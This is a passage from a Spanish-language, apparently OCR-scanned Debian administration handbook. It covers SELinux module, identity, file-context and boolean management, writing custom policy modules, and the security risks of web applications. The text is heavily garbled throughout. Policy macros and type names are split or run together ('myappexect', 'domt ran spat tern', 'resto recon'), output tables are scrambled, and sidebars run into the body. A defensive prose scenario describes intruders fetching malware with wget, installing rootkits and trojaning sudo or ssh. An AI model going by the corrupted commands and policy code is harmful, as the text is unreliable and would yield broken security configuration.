prohibidas  son  registradas  pero  son  ejecutadas  de  todas  formas.  Por  lo  tanto,  debe  modificar  el 
archivo  de  configuration  del  gestor  de  arranque  GRUB  para  anadir  los  parametros  que  desee. 
Una  forma  sencilla  de  hacerlo  es  modificar  la  variable  GRUB_CMDLINE_LINUX  en  el  archivo 
/etc/default/grub  y  ejecutar  update -grub.  SELinux  estara  activo  al  reiniciar. 

Es  importante  saber  que  el  script  selinux  -  activate  automatiza  todas  estas  operaciones  y  fuer- 
za  el  etiquetado  de  archivos  en  el  siguiente  reinicio  (lo  que  evita  que  se  creen  nuevos  archivos 
sin  etiquetar  cuando  SELinux  aun  no  esta  activo  mientras  se  realiza  el  etiquetado). 


14.5.3.  Gestion  de  un  sistema  SELinux 

La  poli'tica  SELinux  consiste  en  un  conjunto  de  reglas  modular,  y  su  instalacion  detecta  y  habilita 
automaticamente  todos  los  modulos  necesarios  en  funcion  de  los  servicios  que  se  encuentren 
instalados.  El  sistema,  por  lo  tanto,  se  encuentra  operativo  de  forma  inmediata.  Sin  embargo, 
cuando  instale  un  servicio  despues  de  haber  instalado  la  poli'tica  SELinux  debera  habilitar  el 
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modulo  correspondiente  manualmente.  Para  ello  existe  el  programa  semodule.  Lo  que  es  mas, 
deberfa  tener  la  capacidad  de  definir  los  roles  que  cada  usuario  puede  adoptar,  lo  que  puede 
realizar  con  el  programa  semanage. 

Puede  utilizar  estos  dos  programas  para  modificar  la  configuracion  actual  de  SELinux,  almace- 
nada  en  /etc/selinux/default/.  A  diferencia  de  otros  archivos  de  configuracion  que  puede 
encontrar  en  /etc/,  no  debe  modificar  estos  archivos  manualmente.  Debe  utilizar  los  progra¬ 
mas  disenados  para  este  proposito. 


YENDOMAsallA  Puesto  que  su  desarrollador  original,  la  agencia  nacional  de  seguridad  estadouni- 
Mas  documentacion  dense  (NSA:  «National  Security  Agency»)  no  proporciona  documentacion  oficial,  la 
comunidad  ha  creado  un  wiki  para  compensarlo.  Dispone  de  mucha  informacion, 
pero  debe  tener  en  cuenta  que  la  mayoria  de  los  que  contribuyen  a  SELinux  son 
usuarios  de  Fedora  (en  la  que  SELinux  esta  habilitado  de  forma  predeterminada). 
Por  este  motivo  la  documentacion  suele  tratar  con  dicha  distribucion  especifica- 
mente. 

http://www.selinuxproject.org 

Tambien  deberia  revisar  la  pagina  del  wiki  de  Debian  dedicada  a  este  tema,  asi  como 
al  blog  de  Russell  Coker,  que  es  uno  de  los  desarrolladores  Debian  mas  activos  que 
trabaja  en  la  compatibilidad  con  SELinux. 

>*•  http://wiki.debian.org/SELinux 

•-  http://etbe.coker.com . a u/ tag/ set in ux/ 


Gestion  de  modulos  SELinux 


Los  modulos  SELinux  disponibles  se  almacenan  en  el  directorio  /usr/share/selinux/ 
default/.  Para  habilitar  uno  de  estos  modulos  en  la  configuracion  actual  debe  ejecutar 
semodule  -i  modulo . pp .  bz2.  La  extension  pp.bz2  significa  paquete  de  politico.  («policy  packa- 
ge»)  comprimido  mediante  bzip2. 

Puede  eliminar  un  modulo  de  la  configuracion  actual  con  semodule  -r  modulo.  Por  ultimo, 
semodule  -l  enumera  los  modulos  instalados  actualmente.  Tambien  imprime  los  numeros  de 
version  correspondientes.  Los  modulos  puden  ser  activados  selectivamente  con  semodule  - e  y 
desactivados  mediante  semodule  -d. 


#  semodule  -i  /usr/share/selinux/default/abrt.pp.bz2 

#  semodule  -l 

abrt  1.5.0  Disabled 

accountsd  1.1.0 

acct  1.6.0 


[...] 

#  semodule  -e  abrt 

#  semodule  -d  accountsd 

#  semodule  -l 
abrt  1.5.0 

accountsd  1.1.0  Disabled 

acct  1.6.0 
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[...] 

#  semodule  -r  abrt 

#  semodule  -l 

accountsd  1.1.0  Disabled 

acct  1.6.0 

[...] 

semodule  carga  inmediatamente  la  nueva  configuracion  a  menos  que  utilice  la  opcion  -n.  De  for¬ 
ma  predeterminada,  el  programa  actua  sobre  la  configuracion  actual  (indicada  por  la  variable 
SELINUXTYPE  en  el  archivo  /etc/selinux/conf ig),  pero  tambien  puede  modificar  una  distin- 
ta  especificandola  con  la  opcion  -s. 


Gestion  de  identidades 


Cada  vez  que  un  usuario  inicia  sesion,  se  le  asigna  una  identidad  SELinux.  Esta  identidad  deter- 
mina  los  roles  que  puede  adoptar.  Puede  configurar  estas  correspondencias  (entre  el  usuario  y 
la  identidad  y  entre  la  identidad  y  los  roles)  con  el  programa  semanage. 

Es  muy  recomenable  que  lea  la  pagina  de  manual  semanage(8),  incluso  cuando  la  sintaxis  del 
programa  tienda  a  ser  similar  para  todos  los  conceptos  que  gestiona.  Encontrara  muchas  opcio- 
nes  comunes  a  todas  las  subordenes:  -a  para  agregar,  -d  para  borrar,  -m  para  modificar,  -I  para 
enumerar  y  -t  para  indicar  un  tipo  (o  dominio). 

semanage  login  -l  enumera  las  correspondencias  actuales  entre  identificadores  de  usuarios 
y  entidades  SELinux.  Los  usuarios  que  no  aparecen  explicitamente  poseen  la  identidad  predeter¬ 
minada,  que  corresponde  al  elemento _ default _ .  Si  ejecuta  semanage  login  -a  -s  user_u 

usuario,  asociara  la  identidad  user_u  con  el  usuario  dado.  Por  ultimo,  semanage  login  -d 
usuario  elimina  la  asociacion  asignada  al  usuario. 

#  semanage  login  -a  -s  user_u  rhertzog 

#  semanage  login  -l 


Login  Name 


SELinux  User 


MLS/MCS  Range  Service 


_ default _ 

rhertzog 

root 

systemu 

#  semanage  login 


unconf inedu 
useru 

unconf inedu 
systemu 

-d  rhertzog 


SystemLow-SystemHigh  * 
SystemLow  * 
SystemLow-SystemHigh  * 
SystemLow-SystemHigh  * 


semanage  user  -l  enumera  las  asociaciones  entre  las  identidades  de  usuario  de  SELinux y  los 
roles  permitidos.  Agregar  una  nueva  identidad  requiere  definir  tanto  sus  roles  correspondien- 
tes  como  un  prefijo  de  etiquetado  que  se  utiliza  para  asignar  un  tipo  a  los  archivos  persona- 
les  (/hom e/ usuario/*).  Debe  elegir  el  prefijo  entre  user,  staff  y  sysadm.  El  prefijo  «staff»  hace 
que  los  archivos  sean  del  tipo  «staff_home_dir_t».  Para  crear  una  nueva  identidad  de  usuario 
SELinux,  ejecute  semanage  user  -a  -R  roles  -P  prefijo  identidad.  Puede  eliminar  una 
identidad  de  usuario  SELinux ejecutando  semanage  user  -d  identidad. 
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#  semanage  user  -a  -R  'staff_r  user_r'  -P  staff  test_u 

#  semanage  user  -l 


Labeling 

MLS/ 

MLS/ 

SELinux  User 

Prefix 

MCS  Level 

MCS  Range 

SELinux  Roles 

root 

sysadm 

SystemLow 

SystemLow-SystemHigh 

staff  r  sysadm  r  system  r 

staff  u 

staff 

SystemLow 

SystemLow-SystemHigh 

staff  r  sysadm  r 

sysadm  u 

sysadm 

SystemLow 

SystemLow-SystemHigh 

sysadm  r 

system  u 

user 

SystemLow 

SystemLow-SystemHigh 

system  r 

testu 

staff 

SystemLow 

SystemLow 

staff  r  user  r 

unconfined  u 

unconfined 

SystemLow 

SystemLow-SystemHigh 

system  r  unconfined  r 

useru 

#  semanage  user 

user 

-d  test_u 

SystemLow 

SystemLow 

user  r 

Gestion  de  contextos  de  archivos,  puertos  y  valores  booleanos 

Cada  modulo  de  SELinux  proporciona  un  conjunto  de  reglas  de  etiquetado  de  archivos,  pero 
tambien  es  posible  crear  reglas  de  etiquetado  personalizadas  para  adaptarse  a  algun  caso  es- 
pecifico.  Por  ejemplo,  si  desea  que  el  servidor  web  sea  capaz  de  leer  archivos  en  el  directorio 
/srv/www/,podriaejecutar  semanage  fcontext  -a  -t  httpd_sys_content_t  "/srv/www(/ 
.*)?"  seguido  de  resto recon  -R  /srv/www/.  La  primera  ejecucion  registra  las  nuevas  reglas 
de  etiquetado,  mientras  que  la  segunda  hace  que  se  reinicialicen  los  tipos  de  archivo  segun  las 
reglas  de  etiquetado  actuales. 

De  forma  similar,  se  etiquetan  los  puertos  TCP/UDP  de  forma  que  asegure  que  unicamente  los 
demonios  correspondientes  puedan  escuchar  en  ellos.  Por  ejemplo,  si  desea  que  el  servidor  web 
pueda  escuchar  en  el  puerto  8080,  debera  ejecutar  semanage  port  -m  -t  http_port_t  -p  t 
cp  8080. 

Algunos  modulos  de  SELinux  exportan  opciones  booleanas  que  puede  ajustar  para  alterar  el  com- 
portamiento  de  las  reglas  predeterminadas.  Puede  utilizar  la  herramienta  getsebool  para  ins- 
peccionar  estas  opciones  (getsebool  opcion  booleana  muestra  una  opcion  concreta,  mien¬ 
tras  que  getsebool  -a  muestra  todas).  La  orden  setsebool  opcion  booleana  valor  cambia 
el  valor  de  una  opcion  booleana.  La  opcion  -P  hace  que  el  cambio  sea  permanente,  es  decir  que 
el  nuevo  valor  se  convierte  en  el  predeterminado  y  se  mantiene  despues  de  reiniciar  el  equipo. 
El  ejemplo  a  continuacion  permite  a  los  servidores  web  acceso  a  los  directories  personales  (esto 
es  util  cuando  los  usuarios  tienen  sitios  web  personales  en  ~/public_html/). 

#  getsebool  httpd_enable_homedirs 
httpdenablehomedirs  -->  off 

#  setsebool  -P  httpd_enable_homedirs  on 

#  getsebool  httpd_enable_homedirs 

httpdenablehomedirs  -->  on 
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14.5.4.  Adaptacion  de  las  reglas 


Puesto  que  la  poh'tica  SELinux  es  modular,  puede  ser  interesante  desarrollar  nuevos  modulos  pa¬ 
ra  aplicaciones  (posiblemente  propias)  que  carezcan  de  uno.  Estos  nuevos  modulos  completaran 
la  politico,  de  referenda. 

Para  crear  nuevos  modulos,  necesitara  los  paquetes  selinux-policy-dev  y  selinux-policy- 
doc.  Este  ultimo  contiene  la  documentacion  de  las  reglas  estandar  (/us r/ share/doc/ 
selinux- policy- doc/html/)  y  los  archivos  de  ejemplo  que  puede  utilizar  como  planti- 
llas  para  crear  nuevo  modulos.  Instale  estos  modulos  y  estudielos  detenidamente: 

$  cp  /usr/share/doc/selinux-policy-doc/Makefile. example  Makefile 
$  cp  /usr/share/doc/selinux-policy-doc/example . fc  ./ 

$  cp  /usr/share/doc/selinux-policy-doc/example . if  ./ 

$  cp  /usr/share/doc/selinux-policy-doc/example . te  ./ 

El  archivo  .te  es  el  mas  importante.  Define  las  reglas.  El  archivo  .  fc  define  los  «contextos  de 
archivo»,  es  decir  los  tipos  asignados  a  los  archivos  relacionados  con  este  modulo.  Los  datos  del 
archivo  .fc  se  utilizan  durante  el  paso  de  etiquetado  de  archivos.  Por  ultimo,  el  archivo  .if 
define  la  interfaz  del  modulo:  es  una  serie  de  «funciones  publicas»  que  otros  modulos  pueden 
utilizar  para  interactuar  con  el  modulo  que  se  esta  creando. 


Creadon  de  un  archivo  .  fc 

Leer  el  ejemplo  a  continuacion  deberfa  ser  suficiente  para  entender  la  estructura  de  este  tipo 
de  archivos.  Puede  utilizar  expresiones  regulares  para  asignar  el  mismo  contexto  de  seguridad 
a  multiples  archivos,  o  incluso  a  un  arbol  de  directories  completo. 


Ejemplo  14.2  Archivo  example,  fc 


#  El  ejecutable  myapp  tendra: 

#  etiqueta:  system_u : object_r : myapp_exec_t 

#  Sensibilidad  MLS:  s0 

#  Categorias  MCS:  <none> 

/usr/sbin/myapp  -  -  gen_context (system_u : object_r:myapp_exec_t , s0) 


Creadon  de  un  archivo  .  i  f 

En  el  ejemplo  a  continuacion,  la  primera  interfaz  («myapp_domtrans»)  controla  quien  puede  uti¬ 
lizar  la  aplicacion.  La  segunda  («myapp_read_log»)  otorga  permisos  de  escritura  a  los  archivos 
de  registro  de  la  aplicacion. 

Cada  interfaz  debe  generar  un  conjunto  de  reglas  valido  que  pueda  ser  integrado  en  un  archivo 
.  te.  Por  lo  tanto,  debe  declarar  todos  los  tipos  que  utilizara  (con  el  macro  gen_require)y  utilizar 
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directivas  estandar  para  otorgar  permisos.  Sepa  que  puede  utilizar  interfaces  proporcionadas 
por  otros  modulos.  La  siguiente  seccion  dara  mas  explicaciones  sobre  como  expresar  estos  per¬ 
misos. 


Ejemplo  14.3  Archivo  ejemplo.  if 


##  <summary>Politica  de  ejemplo  de  Myapp</summary> 
##  <desc> 


## 

## 

## 

## 

## 

## 

## 

## 

## 

## 

## 

## 

## 

## 


<p> 


</p> 

<p> 


</p> 


##  </desc> 
# 


Texto  mas  descriptivo  de  myapp.  La  etiqueta  <desc> 
tambien  puede  utilizar  etiquetas  HTML  <p>, 

<ul>,  and  <ol>  para  dar  formato. 


Esta  politica  es  compatible  con  las  siguientes 
f uncionalidades  de  myapp: 

<ul> 

<li>Funcionalidad  A</li> 

<li>Funcionalidad  B</li> 

<li>Funcionalidad  C</li> 

</ul> 


######################################## 

##  <summary> 

##  Ejecutar  una  transicion  de  dominio  para  ejecutar  myapp. 

##  </summary> 

##  <param  name="domain"> 

##  Dominio  permitido  para  la  transicion 

##  </param> 

# 

interface( 'myappdomtrans' , ' 
gen  require( ' 

type  myapp  t,  myappexect ; 

') 

domt  ran spat tern ( $1 , myappexect , myappt ) 

') 

######################################## 

##  <summary> 

##  Leer  archivos  de  registro  de  myapp. 

##  </summary> 

##  <param  name="domain"> 

##  Dominio  al  que  se  le  permite  leer  archivos  de  registro. 

##  </param> 

# 
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interface( 'myappread  log ' , ' 
gen  require( ' 

type  myapplogt; 

') 


loggingsearchlogs ($1) 

allow  $1  myapplogt : f ile  rfileperms; 


DOCUMENTACION 

La  politica  de  referenda  evoluciona  como  cualquier  proyecto  de  software  libre: 

Expiicaciones  sobre  la 

politica  de  referenda 

basada  en  contribuciones  de  voluntaries.  Tresys,  una  de  las  companias  mas  activas 
en  el  ambito  de  SELinux,  alberga  el  proyecto.  Su  wiki  contiene  expiicaciones  sobre 
la  estructura  de  las  reglas  y  como  puede  crear  nuevas. 

•-  https : //git hub . com/T resysTechnology/ ref policy/wiki/ 
GettingStarted 

Escritura  de  un  archivo  .  te 

Revise  el  archivo  example , 

,  te: 

YENDO  MAS  ALLA 

Paraestructurar  la  politica  correctamente,  los  desarrolladores  de  SELinux  utilizaron 

El  lenguaje  de  macro  m4 

un  procesador  de  macros.  En  lugar  de  duplicar  muchas  directivas  allow  similares, 
crearon  «funciones  macro»  para  utilizar  una  logica  de  mas  alto  nivel  que  tambien 
resulta  en  una  politica  mucho  mas  legible. 

En  la  practica,  utilizamos  m4  para  compilar  estas  reglas.  Realizar  la  operacion  opues- 
ta:  expande  todas  las  directivas  de  alto  nivel  en  una  base  de  datos  gigante  de  direc¬ 
tivas  allow. 

Las  «interfaces»  SELinux  son  solo  funciones  macro  que  seran  substituidas  por  un 
conjunto  de  reglas  en  tiempo  de  compilacion.  De  la  misma  forma,  algunos  permisos 
son  en  realidad  conjuntos  de  permisos  que  son  reemplazados  por  sus  valores  en 
tiempo  de  compilacion. 
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policy_module(myapp, 1 . 0 . 0)  O 

######################################## 

# 

#  Declaraciones 

# 

type  myapp  t;  © 
type  myappexect ; 
domaintype ( myappt ) 

domain_entry_file(myapp_t,  myappexect )  © 

type  myapplog t; 
logging_log_file(myapp_log_t)  © 

type  myapptmpt; 
f ilestmpf ile ( myapptmpt ) 

######################################## 

# 

#  Politica  local  de  Myapp 

# 

allow  myappt  myapplogt : f ile  {  readf ileperms  append  f ileperms  };  © 

allow  myappt  myapptmpt : f ile  managef ileperms ; 
f ilestmpf ilet rans (myappt , myapptmpt , f ile) 


©  El  modulo  debe  ser  identificado  por  su  nombre  y  numero  de  version.  Esta  directiva  es 
obligatoria. 

©  Si  el  modulo  introduce  tipos  nuevos,  debe  declararlos  con  directivas  como  las  siguientes. 
No  dude  en  crear  tantos  tipos  como  necesite  en  lugar  de  otorgar  demasiados  permisos 
inutiles. 

©  Dichas  interfaces  definen  el  tipo  myapp_t  como  un  dominio  de  proceso  que  cualquier 
ejecutable  con  la  etiqueta  myapp_exec_t  deberia  utilizar.  Implicitamente,  esto  agrega  un 
atributo  exec_type  en  estos  objetos,  lo  que  a  su  vez  permite  a  otros  modulos  otorgar  per¬ 
misos  para  ejecutar  dichos  programas:  por  ejemplo,  el  modulo  userdomain  permite  que 
los  ejecuten  los  proceso  con  dominios  user_t,  staff_t  y  sysadm_t.  Los  dominios  de  otras 
aplicaciones  confinadas  no  tendran  los  permisos  para  ejecutarlos  a  menos  que  las  reglas 
les  otorguen  permisos  similares  (este  es  el  caso,  por  ejemplo,  de  dpkg  con  su  dominio 
dpkg_t). 

©  logging_log_file  es  una  interfaz  provista  por  la  politica  de  referencia.  Indica  que  los  archi- 
vos  etiquetados  con  el  tipo  dado  son  archivos  de  registro  que  deben  gozar  de  los  beneficios 
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de  las  reglas  asociadas  (por  ejemplo,  otorgando  permisos  a  log  rotate  para  que  los  pueda 
manipular). 

©  La  directiva  allow  es  la  directiva  base  para  autorizar  una  operacion.  El  primer  parametro 
es  el  dominio  de  proceso  al  que  se  le  permite  ej  ecu  tar  la  operacion.  El  segundo  define  el 
objeto  que  puede  manipular  un  proceso  del  dominio  anterior.  Este  parametro  debe  estar 
en  el  formato  «tipo:clase» ,  en  el  que  tipo  es  el  tipo  SELinux  y  close  describe  la  naturale- 
za  del  objeto  (archivo,  directorio,  zocalo,  tuberia,  etc.).  Finalmente,  el  ultimo  parametro 
describe  los  permisos  (las  operaciones  permitidas). 

Los  permisos  estan  definidos  como  el  conjunto  de  operaciones  permitidas  y  siguen  la  si- 
guiente  plantilla:  {  operacion  7  operacion2  }.  Sin  embargo,  tambien  puede  utilizar  ma¬ 
cros  que  representan  los  permisos  mas  utiles.  El  archivo  /usr/share/selinux/devel/ 
include/support/obj_perm_sets  .  spt  los  enumera. 

La  siguiente  pagina  web  provee  una  lista  relativamente  exhaustiva  de  las  clases  de  objetos 
y  los  permisos  que  puede  otorgar. 

http : //www. selinuxproject . org/page/ObjectClasses Perms 


Ahora  solo  debe  encontrar  el  conjunto  mi'nimo  de  reglas  necesario  para  asegurar  que  la  aplica¬ 
cion  o  servicio  objetivo  funcione  correctamente.  Para  lograrlo,  deberia  tener  buen  conocimiento 
de  como  funciona  la  aplicacion  y  que  tipo  de  datos  genera  o  administra. 

Sin  embargo,  es  posible  un  enfoque  empirico.  Una  vez  que  se  etiquetaron  correctamente  los 
objetos  relevantes,  puede  utilizar  la  aplicacion  en  modo  permisivo:  las  operaciones  que  hubiesen 
estado  bloqueadas  son  registradas  pero  ejecutaran  correctamente.  Si  analiza  los  registros,  ahora 
puede  identificar  las  operaciones  a  permitir.  A  continuacion  encontrara  un  ejemplo  de  elemento 
en  dicho  registro: 

avc:  denied  {  read  write  }  for  pid=1876  comm="syslogd"  name="xconsole"  dev=tmpfs 
ino=5510  scontext=system  u : systemr: syslogd  t:s0  tcontext=system_u :object_r: 
device_t:s0  tclass=f ifof ile  permissive=l 

Para  entender  mejor  este  mensaje,  estudiemoslo  parte  por  parte. 

Observando  esta  entrada  de  registro,  es  posible  crear  una  regia  que  permitirfa  esta  operacion. 
Por  ejemplo:  allow  syslogd  t  device_t:fifo_file  {  read  write  }.  Se  puede  automatizar  este  proce¬ 
so,  que  es  exactamente  lo  que  ofrece  el  paquete  audit2allow  (del  paquete  policycoreutils.  Este 
enfoque  solo  es  util  si  ya  estan  etiquetados  correctamente  los  muchos  objetos  que  deben  ser 
confinados.  En  cualquier  caso,  debe  revisar  cuidadosamente  las  reglas  generadas  y  validarlas 
segun  su  conocimiento  de  la  aplicacion.  En  efecto,  este  enfoque  tiende  a  otorgar  mas  permisos 
de  los  que  son  realmente  necesarios.  La  solucion  apropiada  generalmente  es  crear  nuevos  tipos 
y  otorgar  los  permisos  solo  sobre  dichos  tipos.  Tambien  puede  suceder  que  denegar  una  opera¬ 
cion  no  es  fatal  para  la  aplicacion,  en  cuyo  caso  podria  ser  mejor  simplemente  agregar  una  regia 
«dontaudit»  para  evitar  que  sea  registrada  a  pesar  de  que  sea  denegada. 
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Mensaje 

Description 

avc:denied 

Se  denego  una  operacion. 

{  read  write  } 

Esta  operacion  necesita  los  permisos  read  y 
write. 

pid=1876 

El  proceso  con  PID  1876  ejecuto  la 
operacion  (o  intento  hacerlo). 

comm="syslogd" 

Este  proceso  era  una  instancia  del 
programa  syslogd. 

name="xconsole" 

El  objeto  de  destino  se  llamaba  xconsole.  En 
ciertos  casos  tambien  se  puede  tener  una 
variable  «path»  con  una  ruta  completa. 

dev=tmpfs 

El  dispositivo  que  alberga  el  objeto  destino 
es  un  tmpfs  (sistema  de  archivos  en 
memoria).  Para  un  disco  real,  podrfa  ver  la 
particion  que  alberga  el  objeto  (por 
ejemplo:  «sda3»). 

ino=5510 

El  objeto  esta  identificado  por  el  numero 
de  inodo  5510. 

scontext=system_u : system_r: 
syslogd_t : s0 

Este  es  el  contexto  de  seguridad  del 
proceso  que  ejecuto  la  operacion. 

tcontext=system_u : obj  ect_r : 
devicet : s0 

Este  es  el  contexto  de  seguridad  del  objeto 
destino. 

tclass=fif o_file 

El  objeto  destino  es  un  archivo  FIFO. 

Cuadro  14.1  Analisis  de  una  traza  SELinux 
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COMPLEMENTOS  Puede  parecerle  extrano  que  no  se  mencionen  roles  cuando  se  crean  nuevas  reglas. 
Falta  de  roles  en  las  SELinux  solo  utiliza  los  dominios  para  saber  que  operaciones  estan  permitidas.  El 

reglas  de  la  politica  r°l  s<^°  interviene  indirectamente  permitiendole  al  usuario  cambiar  a  otro  domi- 

nio.  SELinux  esta  basado  en  una  teorfa  conocida  como  forzado  de  tipos  («Type 
Enforcement*)  y  el  tipo  es  el  unico  elemento  que  importa  al  otorgar  permisos. 


Compilacion  de  los  archivos 

Una  vez  que  los  3  archivos  (e  j  emplo .  if,  ej  emplo .  f  c  y  e  j  emplo .  te)  esta  a  la  altura  de  sus  ex- 
pectativas  de  las  nuevas  reglas,  simplemente  ejecute  make  NAME=devel  para  generar  un  modulo 
en  el  archivo  ej  emplo .  pp  (puede  cargarlo  inmediatamente  con  semodule  -i  ej emplo .  pp).  Si 
define  varios  modulos,  make  creara  todos  los  archivos  .  pp  correspondientes. 


14.6.  Otras  consideraciones  relacionadas  con  la  seguridad 

La  seguridad  no  es  solo  un  problema  tecnico:  se  trata  sobre  todo  de  buenas  practicas  y  de  una 
buena  compresion  de  los  riesgos.  Esta  seccion  revisa  algunos  de  los  riesgos  mas  comunes,  as!  co¬ 
mo  tambien  unas  pocas  practicas  recomendadas  que  deberian,  dependiendo  del  caso,  aumentar 
la  seguridad  o  reducir  el  impacto  de  un  ataque  exitoso. 


14.6.1.  Riesgos  inherentes  de  las  aplicaciones  web 

El  caracter  universal  de  las  aplicaciones  web  llevaron  a  su  proliferacion.  Usualmente  se  ejecu- 
tan  varias  en  paralelo:  correo  web,  wiki,  sistema  de  gestion,  foros,  galena  de  fotos,  blog,  etc. 
La  mayoria  de  estas  aplicaciones  estan  basadas  en  la  pila  «LAMP»  (Linux,  Apache,  MySQL,  PHP ). 
Desafortunadamente,  muchas  de  estas  aplicaciones  tambien  fueron  escritas  sin  considerar  los 
problemas  de  seguridad.  Los  datos  que  provienen  del  exterior,  demasiado  seguido,  son  utilizados 
luego  de  escasa  o  nula  validacion.  Se  pueden  proveer  valores  creados  especiales  para  generar 
que  una  llamada  a  un  programa  ejecute  otro  en  cambio.  Con  el  paso  del  tiempo  se  corrigieron 
muchos  de  los  problemas  mas  obvios,  pero  aparecen  nuevos  problemas  regularmente. 


VOCABULARIO  Cuando  un  programa  agrega  datos  a  una  consulta  SQL  de  forma  insegura,  es  vul- 
Inyeccion  SQL  nerable  a  inyecciones  SQL;  este  nombre  hace  referenda  al  acto  de  cambiar  un  pa- 

rametro  de  forma  que  la  consulta  ejecutada  por  el  programa  resultara  diferente 
a  la  esperada,  bien  para  danar  la  base  de  datos  o  para  acceder  a  datos  a  los  que 
normalmente  no  tendrfa  acceso. 

»-  http : //es .Wikipedia . org/wiki/Inyecci%C3%B3n  SQL 


Por  lo  tanto,  es  obligatorio  actualizar  las  aplicaciones  web  regularmente,  para  que  un  «cracker» 
(sea  un  atacante  profesional  o  un  «script  kiddy»)  no  pueda  aprovecharse  de  una  vulnerabilidad 
conocida.  El  riesgo  real  depende  de  cada  caso,  varfa  entre  la  destruccion  de  datos  a  la  ejecucion 
de  codigo  arbitrario,  incluyendo  la  desfiguracion  del  sitio  web. 
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14.6.2.  Saber  que  esperar 

Generalmente  se  utiliza  una  vulnerabilidad  en  una  aplicacion  web  como  punto  de  partida  para 
intentos  de  «cracking».  Lo  que  sigue  es  una  breve  revision  de  las  consecuencias  posibles. 


VISTA  RAPIDA  Apache  2  incluye  modulos  que  permiten  filtrar  consultas  HTTP  entrantes.  Esto  per- 
Filtrado  de  consultas  m ite  bloquear  algunos  vectores  de  ataque.  Por  ejemplo,  limitar  la  longitud  de  los 

HTTP  parametros  puede  prevenir  un  desbordamiento  de  bufer.  De  forma  mas  general, 
puede  validar  los  parametros  inclusive  antes  de  que  sean  pasados  a  la  aplicacion 
web  y  puede  restringir  el  acceso  segun  muchos  criterios.  Inclusive  puede  combi- 
narlo  con  actualizaciones  dinamicas  del  firewall,  para  prohibirle  temporalmente  el 
acceso  al  servidor  web  a  un  cliente  que  infrinja  alguna  de  las  reglas. 

Configurar  estas  verificaciones  puede  ser  una  tarea  larga  y  tediosa,  pero  valdra  la 
pena  cuando  la  aplicacion  web  que  deba  desplegar  tenga  un  historial  de  seguridad 
dudoso. 

mod-security2  (en  el  paquete  Hbapache2-mod-security2)  es  el  modulo  principal  de 
este  tipo.  Incluso  viene  con  muchas  reglas  listas  para  ser  utilizadas  y  de  instalacion 
sencilla  (en  el  paquete  modsecurity-crs). 


Las  consecuencias  de  una  intrusion  tendran  varios  niveles  de  obviedad  dependiendo  de  las  mo- 
tivaciones  del  atacante.  Los  «script  kiddies»  solo  aplican  recetas  que  encuentran  en  sitios  web; 
generalmente  desfiguran  una  pagina  web  o  borran  datos.  En  casos  mas  sutiles  agregan  conteni- 
do  invisible  a  las  paginas  web  para  mejorar  las  referencias  a  sus  propios  sitios  en  los  motores  de 
busqueda. 

Un  atacante  mas  avanzado  ira  mas  alia.  Un  escenario  desastroso  podrfa  ser  como  sigue:  el  ata¬ 
cante  obtiene  la  habilidad  de  ejecutar  programas  como  el  usuario  www-data,  pero  ejecutar  una 
orden  necesita  demasiadas  manipulaciones.  Para  hacer  su  tarea  mas  sencilla,  instala  otra  aplica¬ 
cion  web  disenada  especificamente  para  ejecutar  remotamente  muchas  ordenes  distintas,  como 
navegar  el  sistema  de  archivos,  examinar  permisos,  subir  o  descargar  archivos,  ejecutar  progra¬ 
mas  o  inclusive  proveer  una  consola  de  red.  Generalmente,  la  vulnerabilidad  le  permitira  eje¬ 
cutar  wget  para  descargar  algun  malware  en  /tmp/  y  luego  ejecutarlo.  Usualmente  se  descarga 
dicho  malware  de  un  sitio  web  extranjero  que  fue  comprometido  con  anterioridady  servira  para 
cubrir  sus  huellas  y  hacer  mas  dificil  rastrear  el  origen  real  del  ataque. 

En  este  punto  el  atacante  tiene  suficiente  libertad  de  movimiento  y,  generalmente,  instalan  un 
«bot»  IRC  (un  robot  que  se  conecta  a  un  servidor  IRC  por  el  que  se  lo  puede  controlar).  General¬ 
mente  se  lo  utiliza  para  compartir  archivos  ilegales  (copias  no  autorizadas  de  peliculas  o  softwa¬ 
re,  etc.).  Un  atacante  tenaz  inclusive  podrfa  desear  ir  mas  alia  todavfa.  La  cuenta  www-data  no 
provee  acceso  completo  al  equipo,  el  atacante  intentara  obtener  permisos  de  administrador.  Es¬ 
to  no  deberfa  ser  posible,  pero  si  la  aplicacion  web  no  estaba  actualizada  es  posible  tambien  que 
el  nucleo  y  otros  programas  tampoco  esten  actualizados;  esto  a  veces  deriva  de  una  decision  del 
administrador  que,  a  pesar  de  conocer  la  vulnerabilidad,  descuido  la  actualizacion  del  sistema 
ya  que  no  existen  usuarios  locales.  El  atacante  podra  aprovechar  una  segunda  vulnerabilidad 
para  obtener  permisos  de  root. 
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VOCABULARIO  Este  termino  cubre  cualquier  cosa  que  pueda  ser  utilizada  para  obtener  mas  per- 

Escalada  de  privilegios  rnisos  de  los  que  normalmente  tendria  un  usuario  normal.  El  programa  sudo  esta 

disenado  especificamente  para  proveer  permisos  de  administracion  a  algunos  usua- 
rios.  Pero  tambien  se  utiliza  el  mismo  termino  para  describir  el  acto  en  el  que  un 
atacante  aprovecha  una  vulnerabilidad  para  obtener  permisos  indebidos. 


Ahora  el  atacante  es  dueno  de  la  maquina;  usualmente  intentaran  mantener  este  acceso  privile- 
giado  tanto  como  les  sea  posible.  Esto  involucra  instalar  un  «rootkit»,  un  programa  que  reempla- 
zara  algunos  componentes  del  sistema  para  que  el  atacante  pueda  obtener  privilegios  de  admi- 
nistrador  mas  adelante;  el  «rootkit»  tambien  intentara  esconder  su  propia  existencia  asi  como 
tambien  cualquier  rastro  de  la  intrusion.  Un  programa  ps  comprometido  omitira  algunos  pro- 
cesos,  netstat  no  mostrara  algunas  conexiones  activas,  etc.  Utilizando  los  permisos  de  root,  el 
atacante  pudo  observar  el  sistema  completo  pero  no  encontro  datos  importantes;  por  lo  que  in¬ 
tentara  acceder  a  otras  maquinas  en  la  red  corporativa.  Analizando  la  cuenta  del  administrador 
y  los  archivos  historicos,  el  atacante  encuentra  las  maquinas  a  las  que  se  accede  frecuentemen- 
te.  Puede  interceptar  la  contrasena  de  alguno  de  los  administradores  reemplazando  sudo  o  ssh 
con  una  version  comprometida,  y  luego  utilizar  esta  informacion  en  los  servidores  detectados... 
y  propagar  la  intrusion  de  alii  en  mas. 

Este  es  un  escenario  de  pesadilla  que  se  puede  prevenir  con  varias  medidas.  Las  siguientes  sec- 
ciones  describiran  algunas  de  estas  medidas. 


14.6.3.  Seleccion  prudente  de  software 

Una  vez  que  se  conocen  los  problemas  de  seguridad,  debe  tenerlos  en  cuenta  en  cada  paso  del 
proceso  de  desplegado  de  un  servicio,  especialmente  al  elegir  el  software  que  instalar.  Muchos 
